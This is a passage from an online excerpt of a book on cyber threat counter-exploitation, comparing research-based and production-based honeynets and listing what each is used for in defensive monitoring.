Read Reverse Deception: Organized Cyber Threat Counter-Exploitation Online
Authors: Sean Bodmer
Tags: #General, #security, #Computers
Reduction of false positives
Ability to identify and learn new attacker tools and techniques
Ability to attribute new attacker activity to particular broader problem sets
The following sections briefly discuss the primary two types of honeynets and their advantages and disadvantages.
Research-Based Honeynets
Research-based honeynets are typically found in research institutes of academia or as nonrequirement-driven research projects for personnel within organizations as an educational tool. This type of honeynet is typically not managed regularly or held to any specific overall set of defined standards or reporting requirements. Due to the nature of research-driven honeynets, their goals are generally project or interest based. Research honeynets will generally not be used as an operational test bed unless you have finished reading this book and are planning on researching our recommended best practices, tools, and tactics we have passed onto you through this book.
Research-based honeypots are primarily used for the following purposes:
Learn what the bad guys are doing
Study their methods
Capture their keystrokes
Capture their tools
Monitor their conversations
Maintaining individual research-based systems requires a lot of work.
Generation II honeynets were originally designed to suit research-based honeynet deployments. This was the second generation of honeynet technologies developed through the Honeynet Project. More important to note is that most of the organizations that donated resources to development of the GenII were computer science and security research groups within organizations or universities.
Production-Based Honeynets
Production-based honeynets are typically found in larger organizations or government entities that have definitive requirements for network defense, intelligence, or counterintelligence requirements. This type of honeynet is generally developed with a full development plan and reporting requirements. It is based on a strict configuration management plan in order to get the most out of the operational investment.
Production-based honeynets increase the capability of monitoring and analysis for a large enterprise or production network. The following are some of the primary goals of a production honeynet:
Organization protection
Prevent attacks
Detect attacks
Gather intelligence